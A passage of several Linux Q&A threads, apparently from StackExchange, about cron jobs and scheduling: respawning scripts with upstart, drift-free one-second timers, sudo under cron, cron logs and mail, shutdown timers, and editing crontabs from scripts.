Under Ubuntu, cron writes logs via rsyslogd to /var/log/syslog. You can redirect messages from cron to another file by uncommenting one line in /etc/rsyslog.d/50-default.conf. I believe, the same applies to Debian.
| Cron log on debian systems |
1,341,916,713,000 |
I am running my Python script in the background in my Ubuntu machine (12.04) like this -
nohup python testing.py > test.out &
Now, it might be possible that at some stage my above Python script can die for whatever reason.
So I am thinking to have some sort of cron agent in bash shell script which can restart my above Python script automatically if it is killed for whatever reason.
Is this possible to do? If yes, then what's the best way to solve these kind of problem?
UPDATE:
After creating the testing.conf file like this -
chdir /tekooz
exec python testing.py
respawn
I ran below sudo command to start it but I cannot see that process running behind using ps ax?
root@bx13:/bezook# sudo start testing
testing start/running, process 27794
root@bx13:/bezook# ps ax | grep testing.py
27806 pts/3 S+ 0:00 grep --color=auto testing.py
Any idea why px ax is not showing me anything? And how do I check whether my program is running or not?
This is my python script -
#!/usr/bin/python
while True:
print "Hello World"
time.sleep(5)
|
On Ubuntu (until 14.04, 16.04 and later use systemd) can use upstart to do so, better than a cron job. You put a config setup in /etc/init and make sure you specify respawn
It could be a minimal file /etc/init/testing.conf (edit as root):
chdir /your/base/directory
exec python testing.py
respawn
And you can test with /your/base/directory/testing.py:
from __future__ import print_function
import time
with open('/var/tmp/testing.log', 'a') as fp:
print(time.time(), 'done', file=fp)
time.sleep(3)
and start with:
sudo start testing
and follow what happens (in another window) with:
tail -f /var/tmp/testing.log
and stop with:
sudo stop testing
You can also add [start on][2] to have the command start on boot of the system.
| How to restart the Python script automatically if it is killed or dies |
1,341,916,713,000 |
Question
I'd like to be able to run a UNIX command precisely every second over a long time period.
I need a solution, which does not lag behind after a certain time, because of the time the command itself needs for execution. sleep, watch, and a certain python script all failed me in this regard.
On the microcontroller's such as the http://Arduino.cc I'd do that through hardware clock interrupts.
I'd like to know whether there is a similar time-precise shell script solution. All the solutions which I found within StackExchange.com, resulted in a noticeable time lag, if run over hours. See details below.
Practical purpose / application
I want to test whether my network connection is continuously up by sending timestamps via nc (netcat) every 1 second.
Sender:
precise-timestamp-generator | tee netcat-sender.txt | nc $receiver $port
Receiver:
nc -l -p $port > netcat-receiver.txt
After completion, compare the two logs:
diff netcat-sender.txt netcat-receiver.txt
The diffs would be the untransmitted timestamps.
From this I would know at what time my LAN / WAN / ISP makes troubles.
Solution SLEEP
while [ true ]; do date "+%Y-%m-%d %H:%M:%S" ; sleep 1; done | tee timelog-sleep.txt
Gets a certain offset over time, as the command within the loop also takes a little time.
Precision
cat timelog-sleep.txt
2012-07-16 00:45:16
[...]
2012-07-16 10:20:36
Seconds elapsed: 34520
wc -l timelog-sleep.txt
Lines in file: 34243
Precision summarized:
34520-34243 = 277 timing problems
34520/34243 = 1.008 = 0.8 % off
Solution REPEAT PYTHON
Found at: Repeat a Unix command every x seconds forever
repeat.py 1 "date '+%Y-%m-%d %H:%M:%S'" >> timelog-repeat-py.txt
Supposed to avoid the time offset, but fails to do so.
Precision
wc -l timelog-repeat-py.txt
2012-07-16 13:42:44
[...]
2012-07-16 16:45:24
Seconds elapsed: 10960
wc -l timelog-repeat-py.txt
Lines in file: 10859
Precision summarized:
10960-10859 = 101 timing problems
10960/10859 = 1.009 = 0.9 % off
Solution WATCH
watch -n 1 "date '+%Y-%m-%d %H:%M:%S' >> ~/Desktop/timelog-watch.txt"
Precision
wc -l timelog-watch.txt
2012-07-16 11:04:08
[...]
2012-07-16 13:25:47
Seconds elapsed: 8499
wc -l timelog-watch.txt
Lines in file: 8366
Precision summarized:
8499-8366 = 133 timing problems.
8499/8366 = 1.016 = 1.6 % off.
|
How does this Perl script I just whipped up work?
#!/usr/bin/perl
use strict;
use warnings;
use Time::HiRes qw/time sleep/;
sub launch {
return if fork;
exec @_;
die "Couldn't exec";
}
$SIG{CHLD} = 'IGNORE';
my $interval = shift;
my $start = time();
while (1) {
launch(@ARGV);
$start += $interval;
sleep $start - time();
}
Use: perl timer.pl 1 date '+%Y-%m-%d %H:%M:%S'
It has been running 45 minutes without a single skip, and I suspect it will continue to do so unless a) system load becomes so high that fork() takes more than a second or b) a leap second is inserted.
It cannot guarantee, however, that the command runs at exact second intervals, as there is some overhead, but I doubt it is much worse than an interrupt-based solution.
I ran it for about an hour with date +%N (nanoseconds, GNU extension) and ran some statistics on it. The most lag it had was 1 155 microseconds. Average (arithmetic mean) 216 µs, median 219 µs, standard deviation 42 µs. It ran faster than 270 µs 95% of the time. I don't think you can beat it except by a C program.
| Run unix command precisely at very short intervals WITHOUT accumulating time lag over time |
1,341,916,713,000 |
Is there any variable that cron sets when it runs a program ? If the script is run by cron, I would like to skip some parts; otherwise invoke those parts.
How can I know if the Bash script is started by cron ?
|
I'm not aware that cron does anything to its environment by default that can be of use here, but there are a couple of things you could do to get the desired effect.
1) Make a hard or soft link to the script file, so that, for example, myscript and myscript_via_cron point to the same file. You can then test the value of $0 inside the script when you want to conditionally run or omit certain parts of the code. Put the appropriate name in your crontab, and you're set.
2) Add an option to the script, and set that option in the crontab invocation. For example, add an option -c, which tells the script to run or omit the appropriate parts of the code, and add -c to the command name in your crontab.
And of course, cron can set arbitrary environment variables, so you could just put a line like RUN_BY_CRON="TRUE" in your crontab, and check its value in your script.
| Check if script is started by cron, rather than invoked manually |
1,341,916,713,000 |
I'm curious to know: why are crontabs stored in /var rather than in the user's home directories? It makes it a total pain to isolate these files for upgrades but I suspect that there is a logical reason...
|
Few reasons I can think of:
In corporate environments, you can have thousands of users. If so, cron would have to scan through every single user's directory every single minute to check for the crontab file (whether it has been created, deleted, or modified).
By keeping them in a single location, it doesn't have to do this intensive scan.
Home directories might not be always available. If the home directories are an autofs mount, they might not be mounted. Having cron check them every single minute would cause them to be mounted, and prevent them from unmounting due to inactivity. Also if the home directory is encrypted, and decrypted with the user's password, cron won't be able to get to the home directory unless the user has logged in and decrypted/mounted it.
Home directories might be shared across hosts. If the home directory is a network share, that same home directory will appear on multiple hosts. But you might not want your cron jobs to run on every single host, just one of them.
| Why aren't crontabs stored in user home directories? |
1,341,916,713,000 |
When I schedule a job, some seem to be applied immediately, while others after a reboot. So is it recommended to restart cron (crond) after adding a new cron job? How to do that properly (esp. in a Debian system), and should that be done with sudo (like sudo service cron restart) even for that of normal users'?
I tried:
/etc/init.d/cron restart
which doesn't seem to work (neither does /etc/init.d/cron stop or service cron stop) and completes with return code 1.
Here's a part of the message output:
Since the script you are attempting to invoke has been converted to an
Upstart job, you may also use the stop(8) utility, e.g. stop cron
stop: Rejected send message, 1 matched rules; type="method_call", sender=":1.91" (uid=1000 pid=3647 comm="stop cron ") interface="com.ubuntu.Upstart0_6.Job" member="Stop" error name="(unset)" requested_reply="0" destination="com.ubuntu.Upstart" (uid=0 pid=1 comm="/sbin/init")
(what does that mean?)
|
No you don't have to restart cron, it will notice the changes to your crontab files (either /etc/crontab or a users crontab file).
At the top of your /etc/crontab you probably have (if you have the Vixie implementation of cron that IIRC is the one on Debian):
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
The reason you might not see specific changes implemented is if you add things to e.g. /etc/cron.daily and the daily run has already occurred.
The message that you get is because you use an old way of restarting cron on your system. The recommended way (but not necessary if you just edit cron files) is:
restart cron
You of course have to reboot in order to see the effects of a @reboot cron job
| Is a restart of cron or crond necessary after each new schedule addition or modification? |
1,341,916,713,000 |
The Case:
I need to run some commands/script at certain intervals of time and for this I have two options:
set up a cron-job
implement a loop with sleep in the script itself.
Question:
Which is the better option from resource consumption point of view, why? Is cron the better way? Does cron use some kind of triggers or something making it efficient over the other? What procedure does cron use to check and start the jobs?
|
Use cron because it is a better and more standard practice. At least if this is something that will regularly run (not just something you patched together in a minute). cron is a cleaner and more standard way. It's also better because it runs the shell detached from a terminal - no problem with accidental termination and dependencies on other processes.
Regarding the resources:
CPU: Both processes sleep - when they sleep, they do not waste CPU. cron wakes up more frequently to check on things, but it does that anyway (no more for your process). And this is negligible load, most daemons wake up occasionally.
Memory: You probably have cron running regardless of this process, so this is no overhead at all. However, cron will only start the shell when the script is called, whereas your script remains loaded in memory (a bash process with environment - a few kilobytes, unless you are loading everything in shell variables).
All in all, for resources it doesn't matter.
| cron Vs. sleep - which is the better one in terms of efficient cpu/memory utilization? |
1,341,916,713,000 |
I have a script run from a non-privileged users' crontab that invokes some commands using sudo. Except it doesn't. The script runs fine but the sudo'ed commands silently fail.
The script runs perfectly from a shell as the user in question.
Sudo does not require a password. The user in question has (root) NOPASSWD: ALL access granted in /etc/sudoers.
Cron is running and executing the script. Adding a simple date > /tmp/log produces output at the right time.
It's not a permissions problem. Again the script does get executed, just not the sudo'ed commands.
It's not a path problem. Running env from inside the script being run shows the correct $PATH variable that includes the path to sudo. Running it using a full path doesn't help. The command being executed is being given the full path name.
Trying to capture the output of the sudo command including STDERR doesn't show anything useful. Adding sudo echo test 2>&1 > /tmp/log to the script produces a blank log.
The sudo binary itself executes fine and recognizes that it has permissions even when run from cron inside the script. Adding sudo -l > /tmp/log to the script produces the output:
User ec2-user may run the following commands on this host:
(root) NOPASSWD: ALL
Examining the exit code of the command using $? shows it is returning an error (exit code: 1), but no error seems to be produced. A command as simple as /usr/bin/sudo /bin/echo test returns the same error code.
What else could be going on?
This is a recently created virtual machine running the latest Amazon Linux AMI. The crontab belongs to the user ec2-user and the sudoers file is the distribution default.
|
sudo has some special options in its permissions file, one of which allows a restriction on its usage to shells that are are running inside a TTY, which cron is not.
Some distros including the Amazon Linux AMI have this enabled by default. The /etc/sudoers file will look something like this:
# Disable "ssh hostname sudo <cmd>", because it will show the password in clear.
# You have to run "ssh -t hostname sudo <cmd>".
#
Defaults requiretty
#
# Refuse to run if unable to disable echo on the tty. This setting should also be
# changed in order to be able to use sudo without a tty. See requiretty above.
#
Defaults !visiblepw
If you had captured output to STDERR at the level of the shell script rather than the sudo command itself, you would have seem a message something like this:
sorry, you must have a tty to run sudo
The solution is to allow sudo to execute in non TTY environments either by removing or commenting out these options:
#Defaults requiretty
#Defaults !visiblepw
| Why does cron silently fail to run sudo stuff in my script? |
1,341,916,713,000 |
I've had a cronjob working for about a fortnight without any problems.
Then last night I checked I didn't get the email that I usually get.
I went to the terminal to try send myself an email, I got the following error:
mail: cannot send message: process exited with a non-zero status
I haven't changed anything with my ssmtp cfg file. It just stopped working, when I check and recheck everything, the code, ssmtp, everything is perfect.
I send out my emails twice a day via cronjob. The crontab hasn't been interfered either. I really don't know why it would stop working.
The system sends out emails via gmail - I've gone into the gmail account and sent out test emails, they are sent and received without any problems.
Additionally I've checked throughout google, forums, websites I don't see any mistakes. This makes sense as everything was working fine 24 hours ago, and now it's just stopped.
Q: Is there any way of diagnosing and troubleshooting how to solve such a problem?
|
I have get the same problem in an Ubuntu 14.04 server. And I find error message in /var/log/mail.err, which said:
postfix/sendmail[27115]: fatal: open /etc/postfix/main.cf: No such file or directory
Then I just reconfigured postfix and solved this problem.
sudo dpkg-reconfigure postfix
| mail: cannot send message: process exited with a non-zero status |
1,341,916,713,000 |
It's not clear to be from the manpage for crontab. IS extra white space allowed between the fields? e.g., if I have this:
1 7 * * * /scripts/foo
5 17 * * 6 /script/bar
31 6 * * 0 /scripts/bofh
is it safe to reformat it nicely like this:
1 7 * * * /scripts/foo
5 17 * * 6 /script/bar
31 6 * * 0 /scripts/bofh
?
|
Yes extra space is allowed and you can nicely line up your fields for readability. From man 5 crontab
Blank lines and leading spaces and tabs are ignored.
and
An environment setting is of the form,
name = value
where the spaces around the equal-sign (=) are optional, and any sub‐
sequent non-leading spaces in value will be part of the value assigned
to name.
For the fields itself the man pages says:
The fields may be separated by spaces or tabs.
That should be clear: multiple spaces are allowed.
| Do spaces matter in a crontab |
1,341,916,713,000 |
I used crontab -e to add the following line to my crontab:
* * * * * echo hi >> /home/myusername/test
Yet, I don't see that the test file is written to. Is this a permission problem, or is crontab not working correctly?
I see that the cron process is running. How can I debug this?
Edit - Ask Ubuntu has a nice question about crontab, unfortunately that still doesn't help me.
Edit 2 - Hmm, it seems my test file has 214 lines, which means for the last 214 minutes it has been written to every minute. I'm not sure what was the problem, but it's evidently gone.
|
There are implementations of cron (not all of them, and I don't remember which offhand, but I've encountered one under Linux) that check for updated crontab files every minute on the minute, and do not consider new entries until the next minute. Therefore, a crontab can take up to two minutes to fire up for the first time. This may be what you observed.
| Why did my crontab not trigger? |
1,341,916,713,000 |
I want two jobs to run sometime every day, serially, in exactly the order I specify. Will this crontab reliably do what I want?
@daily job1
@daily job2
I'm assuming they run one after the other, but I was unable to find the answer by searching the Web or from any of these manpages: cron(1), crontab(1), crontab(5).
The crontab above obviously won't do what I want if cron runs things scheduled with @daily in parallel or in an unpredictable order.
I know I can simply make one shell script to fire them off in order, I'm just curious how cron is supposed to work (and I'm too lazy to gather test data or read the source code).
Cron is provided by the cron package. OS is Ubuntu 10.04 LTS (server).
|
After a quick glance at the source (in Debian squeeze, which I think is the same version), it does look like entries within a given file and with the same times are executed in order. For this purpose, @daily and 0 0 * * * are identical (in fact @daily is identical to 0 0 * * * in this cron).
I would not rely on this across the board. It's possible that one day someone will decide that cron should run jobs in parallel, to take advantage of these 32-core CPUs that have 31 cores running idle. This might be done when implementing this 20-year old todo item encountered in the cron source:
All of these should be flagged and load-limited; i.e.,
instead of @hourly meaning "0 * * * *" it should mean
"close to the front of every hour but not 'til the
system load is low". (…) (vix, jan90)
It's very easy to write @daily job1; job2 here. If it's important that the jobs execute in order, make it a direct consequence of what you write.
Additionally, making the order explicit removes the risk that a future administrator will reorder the lines thinking that it won't matter.
| Are multiple @daily crontab entries processed in order, serially? |
1,341,916,713,000 |
Is this valid crontab time specification, doing what is expected:
0 22-4 * * *
Or is it necessary to do something like
0 22,23,0,1,2,3,4 * * *
|
I've never attempted to use a range like that, and I'm not sure whether it would work. So my first advice would be to test it and see what happens - though probably with a script that only does a log entry or something else innocuous.
Second, for ATT and BSD cron you can't have ranges and lists co-existing, so there you'd either have to list each hour separately or have two lines, one with the range and one with the list.
| Crontab entry with hour range going over midnight |
1,327,513,801,000 |
I need to remove files older than 3 days with a cron job in 3 different directories. (these 3 directories are children of a parent directory /a/b/c/1 & /a/b/c/2 & /a/b/c/3) Can this be done with one line in the crontab?
|
This is easy enough (although note that this goes by a modification time more than 3 days ago since a creation time is only available on certain filesystems with special tools):
find /a/b/c/1 /a/b/c/2 -type f -mtime +3 #-delete
Remove the # before the -delete once you are sure that it is finding the files you want to remove.
To have it run by cron, I would probably just create an executable script (add a shebang - #!bin/sh to the top line of the file and make executable with chmod a+x), then put it in an appropriate cron directory like /etc/cron.daily or /etc/cron.weekly. Provided of course that you do not need a more specific schedule and that these directories exist on your distro.
Update
As noted below, the -delete option for find isn't very portable. A POSIX compatible approach would be:
find /a/b/c/1 /a/b/c/2 -type f -mtime +3 #-exec rm {} +
Again remove the # when you are sure you have the right files.
Update2
To quote from Stéphane Chazelas comment below:
Note that -exec rm {} + has race condition vulnerabilities which -delete (where available) doesn't have. So don't use it on directories that are writeable by others. Some finds also have a -execdir that mitigates against those vulnerabilities.
| Cron job to delete files older than 3 days |
1,327,513,801,000 |
I have a cron job that is running a script. When I run the script via an interactive shell (ssh'ed to bash) it works fine. When the script runs by itself via cron it fails.
My guess is that it is using some of the environmental variables set in the interactive shell. I'm going to troubleshoot the script and remove these.
After I make changes, I know I could queue up the script in cron to have it run as it would normally, but is there a way I can run the script from the command line, but tell it to run as it would from cron - i.e. in a non-interactive environment?
|
The main differences between running a command from cron and running on the command line are:
cron is probably using a different shell (generally /bin/sh);
cron is definitely running in a small environment (which ones depends on the cron implementation, so check the cron(8) or crontab(5) man page; generally there's just HOME, perhaps SHELL, perhaps LOGNAME, perhaps USER, and a small PATH);
cron treats the % character specially (it is turned into a newline);
cron jobs run without a terminal or graphical environment.
The following invocation will run the shell snippet pretty much as if it was invoked from cron. I assume the snippet doesn't contain the characters ' or %.
env - HOME="$HOME" USER="$USER" PATH=/usr/bin:/bin /bin/sh -c 'shell snippet' </dev/null >job.log 2>&1
See also executing a sh script from the cron, which might help solve your problem.
| Run script in a non interactive shell? |
1,327,513,801,000 |
I need to run a script every 64 hours. I couldn't find the answer with cron. Is it possible with it, or should I use a loop in a shell script?
|
I suggest perhaps using a crontab "front end" like crontab.guru for figuring out crontab if you're a beginner.
However, as in your case, the hour setting only allows for values of 0 to 23, so you can't use crontab here.
Instead, I'd suggest using at. In your case, I'd probably use something like:
at now + 64 hours
and then enter your command or
echo "<your command>" | at now + 64 hours
at the beginning of your script, etc.
Basically, you'll be scheduling running the command right when the command has been invoked the last time. Also, if you don't want a time delta, rather the exact time, I suggest doing a bit of time arithmetic, and then use an exact time with at to have the command run.
I highly suggest reading the man page of at, as it is fairly comprehensive.
| How to run a script every 64 hours? |
1,327,513,801,000 |
How do I temporarily disable one or more users' cron jobs? In particular, I do not want to suspend the user's cron rights - merely not fire any of their jobs.
I am on SLES 11 SP2 and SP3 systems
|
(Note that this answer was written in the days before systemd. I haven't checked how systemd's version of cron behaves in this scenario.)
touch /var/spool/cron/crontabs/$username; chmod 0 /var/spool/cron/crontabs/$username should do the trick. Restore with chmod 600 and touch (you need to change the file's mtime to make cron (attempt to) reload it).
On at least Debian and probably with Vixie cron in general, chmod 400 /var/spool/cron/crontabs/$username also does the trick, because that implementation insists on permissions being exactly 600. However this only lasts until the user runs the crontab command.
If you want a robust way, I don't think there's anything better than temporarily moving their crontab out of the way or changing the permissions, and temporarily adding them to /etc/cron.deny.
| how to temporarily disable a user's cronjobs? |
1,327,513,801,000 |
Could you advise me what to write in crontab so that it runs some job (for testing I will use /usr/bin/chromium-browser) every 15 seconds?
|
You can't go below one minute granularity with cron. What you can do is, every minute, run a script that runs your job, waits 15 seconds and repeats. The following crontab line will start some_job every 15 seconds.
* * * * * for i in 0 1 2; do some_job & sleep 15; done; some_job
This script assumes that the job will never take more than 15 seconds. The following slightly more complex script takes care of not running the next instance if one took too long to run. It relies on date supporting the %s format (e.g. GNU or Busybox, so you'll be ok on Linux). If you put it directly in a crontab, note that % characters must be written as \% in a crontab line.
end=$(($(date +%s) + 45))
while true; do
some_job &
[ $(date +%s) -ge $end ] && break
sleep 15
wait
done
[ $(date +%s) -ge $(($end + 15)) ] || some_job
I will however note that if you need to run a job as often as every 15 seconds, cron is probably the wrong approach. Although unices are good with short-lived processes, the overhead of launching a program every 15 seconds might be non-negligible (depending on how demanding the program is). Can't you run your application all the time and have it execute its task every 15 seconds?
| Cron running job every 15 seconds |
1,327,513,801,000 |
I add some job in crontab file on a server.
When I log out and the server is still on, will the job still run?
Does it matter if I create a screen or tmux session and run some shell in it and detach it before log out?
|
cron is a process which deals with scheduled tasks whether you are logged in or not. It is not necessary to have a screen or tmux session running since the cron daemon will execute the scheduled tasks in separate shells.
See man cron and man crontab for details.
| Does a job scheduled in crontab run even when I log out? |
1,327,513,801,000 |
I've edited my root cron tab to periodically execute a script located in a particular user's folder using this command:
sudo crontab -e
When cron runs the script, this is the output:
sh: 1: /home/user/Location/Of/Script: Permission denied
I thought that the root cron had permission to do anything. I have no issue when I manually run this script as root.
I've read in the documentation that further error info can be found here:
sudo cat /var/log/syslog
Here's what I found:
Jan 30 12:30:01 backup CRON[17702]: (CRON) info (No MTA installed, discarding output)
However, I think this is probably unrelated to the permission denied issue.
So what do I really need to do?
|
I think that your script is not executable. So, use the following command to make it:
chmod +x /home/user/Location/Of/Script
Or, if you are not the owner of that script:
sudo chmod +x /home/user/Location/Of/Script
| Root Cron Won't Run Script (permission denied) |
1,327,513,801,000 |
I have the following general question regarding cron jobs.
Suppose I have the following in my crontab:
* 10 * * * * someScript.sh
* 11 * * * * someScript2.sh
30 11 */2 * * someScript3.sh <-- Takes a long time let's say 36 hours.
* 12 * * * someScript4.sh
Is it smart enough to run the remaining jobs at the appropriate times? For example, the long script doesn't need to terminate?
Also, what happens if the initial long script is still running and it gets called by cron again?
|
Each cron job is executed independent of any other jobs you may have specified. This means that your long-lived script will not impede other jobs from being executed at the specified time.
If any of your scripts are still executing at their next scheduled cron interval, then another, concurrent, instance of your script will be executed.
This can have unforeseen consequences depending on what your script does. I would recommend reading the Wikipedia article on File Locking, specifically the section on Lock files. A lock file is a simple mechanism to signal that a resource — in your case the someScript3.sh script — is currently 'locked' (i.e. in use) and should not be executed again until the lock file is removed.
Take a look at the answers to the following question for details of ways to implement a lock file in your script:
How to make sure only one instance of a bash script runs?
| Run multiple cron jobs where one job takes a long time |
1,327,513,801,000 |
I have several SSL certificates, and I would like to be notified, when a certificate has expired.
My idea is to create a cronjob, which executes a simple command every day.
I know that the openssl command in Linux can be used to display the certificate info of remote server, i.e.:
openssl s_client -connect www.google.com:443
But I don't see the expiration date in this output. Also, I have to terminate this command with CTRL+c.
How can I check the expiration of a remote certificate from a script (preferably using openssl) and do it in "batch mode" so that it runs automatically without user interaction?
|
Your command would now expect a http request such as GET index.php for example. Use this instead:
if true | openssl s_client -connect www.google.com:443 2>/dev/null | \
openssl x509 -noout -checkend 0; then
echo "Certificate is not expired"
else
echo "Certificate is expired"
fi
true: will just give no input followed by eof, so that openssl exits after connecting.
openssl ...: the command from your question
2>/dev/null: error output will be ignored.
openssl x509: activates X.509 Certificate Data Management.
This will read from standard input defaultly
-noout: Suppresses the whole certificate output
-checkend 0: check if the certificate is expired in the next 0 seconds
| script to check if SSL certificate is valid |
1,327,513,801,000 |
My colleague ran grep | crontab. After that all jobs disappeared. Looks like he was trying to run crontab -l.
So what happened after running the command grep | crontab? Can anyone explain?
|
crontab can install new crontab for the invoking user (or the mentioned user as root) reading from STDIN. This is what happended in your case.
grep without any option will generate an error message on STDERR as usual and you are piping the STDOUT of grep to STDIN of crontab which is blank hence your crontab will be gone.
| Can grep | crontab destroy all jobs? |
1,327,513,801,000 |
I have a script that I want to be able to run in two machines. These two machines get copies of the script from the same git repository. The script needs to run with the right interpreter (e.g. zsh).
Unfortunately, both env and zsh live in different locations in the local and remote machines:
Remote machine
$ which env
/bin/env
$ which zsh
/some/long/path/to/the/right/zsh
Local machine
$ which env
/usr/bin/env
$which zsh
/usr/local/bin/zsh
How can I set up the shebang so that running the script as /path/to/script.sh always uses the Zsh available in PATH?
|
You cannot solve this through shebang directly, since shebang is purely static. What you could do is having some »least common multiplier« (from a shell perspective) in the shebang and re-execute your script with the right shell, if this LCM isn't zsh. In other words: Have your script executed by a shell found on all systems, test for a zsh-only feature and if the test turns out false, have the script exec with zsh, where the test will succeed and you just continue.
One unique feature in zsh, for example, is the presence of the $ZSH_VERSION variable:
#!/bin/sh -
[ -z "$ZSH_VERSION" ] && exec zsh - "$0" ${1+"$@"}
# zsh-specific stuff following here
echo "$ZSH_VERSION"
In this simple case, the script is first executed by /bin/sh (all post-80s Unix-like systems understand #! and have a /bin/sh , either Bourne or POSIX but our syntax is compatible to both). If $ZSH_VERSION is not set, the script exec's itself through zsh. If $ZSH_VERSION is set (resp. the script already is run through zsh), the test is simply skipped. Voilà.
This only fails if zsh isn't in the $PATH at all.
Edit: To make sure, you only exec a zsh in the usual places, you could use something like
for sh in /bin/zsh \
/usr/bin/zsh \
/usr/local/bin/zsh; do
[ -x "$sh" ] && exec "$sh" - "$0" ${1+"$@"}
done
This could save you from accidentally exec'ing something in your $PATH which is not the zsh you're expecting.
| Path independent shebangs |
1,327,513,801,000 |
No /var/log/cron, no /var/log/cron.log on my Debian 7. Where is my logfile of crontab?
ls /var/log/cron*
ls: cannot access /var/log/cron*: No such file or directory
|
I think on debian cron writes logs in /var/log/syslog.
If your system depends on rsyslogor syslogd you can check and uncomment either in /etc/rsyslog.conf or /etc/syslog.conf for line:
# cron.* /var/log/cron.log
and then restart services.
If your system depends on systemd for example you can check with following command:
journalctl _COMM=cron
or
journalctl _COMM=cron --since="date" --until="date"
For date format you can check journalctl.
| Where is my logfile of crontab? |
1,327,513,801,000 |
I have set up a backup script to back up world data on my Minecraft server hourly using cron, but because the worlds being constantly edited by players, tar was telling me that files changed while they were read. I added --ignore-command-error to the tar in the script and that suppresses any errors when I run it manually, however cron still sends a mail message saying that files were changed while being read, and ends up flooding my mail because it's run once an hour. Anyone know how to fix this? This is the script:
filename=$(date +%Y-%m-%d)
cd /home/minecraft/Server/
for world in survival survival_nether survival_the_end creative superflat
do
if [ ! -d "/home/minecraft/backups/$world" ]; then
mkdir /home/minecraft/backups/$world
fi
find /home/minecraft/backups/$world -mtime +1 -delete
tar --ignore-command-error -c $world/ | nice -n 10 pigz -9 > /home/minecraft/backups/$world/$filename.tar.gz
done
|
Cron will attempt to send an email with any output that may have occurred when the command was run. From cron's man page:
When executing commands, any output is mailed to the owner of the
crontab (or to the user specified in the MAILTO environment variable
in the crontab, if such exists). Any job output can also be sent to
syslog by using the -s option.
So to disable it for a specific crontab entry just capture all of the commands output and either direct it to a file or to /dev/null.
30 * * * * notBraiamsBackup.sh >/dev/null 2>&1
| Stop cron sending mail for backup script? |
1,327,513,801,000 |
I am using crontab for the first time. Want to write a few very simple test cron tasks, and run them.
$crontab * * * * * echo "Hi"
doesn't produce anything.
crontab */1 * * * * echo "hi"
says */1: No such file or directory.
Also, how do I list the currently running cron tasks (not just the ones I own, but ones started by other users such as root as well).
And how do I delete a particular cron task?
|
You can't use crontab like that. Use man crontab to read about the correct way of calling this utility.
You'll want to use crontab -e to edit the current user's cron entries (you can add/modify/remove lines). Use crontab -l to see the current list of configured tasks.
As for seeing other user's crontabs, that's not possible without being root on default installations. See How do I list all cron jobs for all users for some ways to list everything (as root).
Note: be very careful when you use shell globbing characters on the command line (* and ? especially). * will be expanded to the list of files in the current directory, which can have unexpected effects. If you want to pass * as an argument to something, quote it ('*').
| How do I add an entry to my crontab? |
1,327,513,801,000 |
What's the best way to suppress output (stdout and stderr) unless the program exits with a non-zero code? I'm thinking:
quiet_success()
{
file=$(mktemp)
if ! "$@" > "$file" 2>&1; then
cat "$file"
fi
rm -f "$file"
}
And run quiet_success my_long_noisy_script.sh but I'm not sure if there's a better way. I feel like this has to be something other people have needed to do.
For context, I'm looking to add this to my cron scripts so that I get emailed with everything if they fail, but not if they don't.
|
You're going to have to buffer the output somewhere no matter what, since you need to wait for the exit code to know what to do. Something like this is probably easiest:
$ output=`my_long_noisy_script.sh 2>&1` || echo $output
| Suppress output unless non-zero exit code |
1,327,513,801,000 |
I have a server that it is normally switched off for security reasons. When I want to work on it I switch it on, execute my tasks, and shut it down again. My tasks usually take no more than 15 minutes. I would like to implement a mechanism to shut it down automatically after 60 minutes.
I've researched how to do this with cron, but I don't think it's the proper way because cron doesn't take into account when the server was last turned on. I can only set periodic patterns, but they don't take that data into account.
How could I do this implementation?
|
If you execute your tasks as the same user every time, you can simply add the shutdown command, optionally with the option -P, to your profile. The number stands for the amount of minutes the shutdown command is delayed.
Make sure your user has the ability to execute the shutdown command via sudo without a password.
echo "sudo shutdown -P +60" >> ~/.profile
Added:
After reading most of the other answers I love the option to add "@reboot /<path to script/command>" in (root) cron. Answer given by sebasth as his fourth option. You may either add the shutdown command or write a small script that executes the shutdown and execute that via cron.
WoJ also has a great solution if you use systemd.
| How do I shut down a Linux server after running for 60 minutes? |
1,327,513,801,000 |
How can I only receive emails from cron if there are errors?
In the overwhelmingly vast majority of cases, the tasks will run just fine - and I truly do not care about the output.
It is only in the rare case of a failure that I want/need to know.
I have procmail available - but am not sure if what I'm describing is possible to manage externally to cron "correctly".
|
As you are not caring for the output, you can redirect the STDOUT of a job to /dev/null and let the STDERR being send via mail (using MAILTO environment variable).
So, for example:
...
...
[email protected]
...
...
* * * * * /my/script.sh >/dev/null
will send mail when there is output only on STDERR (with the STDERR), and will discard the STDOUT.
This of course assumes that when a program has written on STDERR, has failed; this might not be always the case. If you have control over the program, you can make it do so. For any complex case, you should write a wrapper of some kind that runs the command(s) and send mail accordingly. And put the wrapper as the cron job.
| Disable cron emails unless there are errors? |
1,327,513,801,000 |
This is a Red Hat Enterprise Linux 5 system (RHEL). We manage this system using CFengine.
We have several cronjobs which are running twice as often as usual. I checked the cronjobs under /etc/cron.d/ and this directory contains the actual script called host-backup, and also contains a cfengine backup file called host-backup.cfsaved, as so:
/etc/cron.d/host-backup
/etc/cron.d/host-backup.cfsaved
Does this operating system execute all files at /etc/cron.d/*, or does it only execute files which match a certain pattern. Can I configure this, and where is this defined?
I cannot find this answer in the RHEL or CentOS documentation.
|
(If you're paying for Red Hat support, you should ask them this kind of questions. This is exactly what you're paying for!)
From the RHEL5 crontab(5) man page:
If it exists, the /etc/cron.d/ directory is parsed like the cron spool directory, except that the files in it are not user-specific and are therefore read with /etc/crontab syntax (the user is specified explicitly in the 6th column).
(Is there a simpler way of reading RHEL man pages without having access to it? At least this way I could see that this paragraph is part of the Red Hat patch, so it's not a standard Vixie Cron 4.1 feature.)
Looking at the source, I see that the following files are skipped: .*, #*, *~. *.rpmnew, *.rpmorig, *.rpmsave. So yes, your *.cfsaved files are read in addition to the originals.
| Does RHEL/CentOS execute all cronjob files under /etc/cron.d/*, or just some of them? |
1,327,513,801,000 |
I have a deployment script.
It must add something to a user crontab
(trigger a script that cleans logs every XXX days);
however, this must be done only during the first deployment,
or when it needs to be updated.
(I can run xxx.py deploy env or xxx.py update env.)
so I need to do this:
Check if my cronJob already exists
Submit my cronJob if it does not already exist
or
update my cronJob if one of the parameter(s) of the command is different
I don't see how to add/check/remove something to the crontab
without using crontab -e or "manually" editing the crontab file
(download it, rewrite it, re-upload it).
PS: this is a user specific cronjob;
"webadmin" is going to do it and he should not use sudo to do it.
|
My best idea so far
To check first if the content matches what should be in there and only update if it doesn't:
if [[ $(crontab -l | egrep -v "^(#|$)" | grep -q 'some_command'; echo $?) == 1 ]]
then
set -f
echo $(crontab -l ; echo '* 1 * * * some_command') | crontab -
